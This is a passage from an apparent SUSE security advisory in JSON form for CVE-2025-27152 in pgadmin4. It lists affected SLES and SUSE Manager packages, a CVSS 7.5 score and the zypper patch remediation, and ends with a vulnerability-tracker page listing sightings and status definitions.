"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-16T08:37:10Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…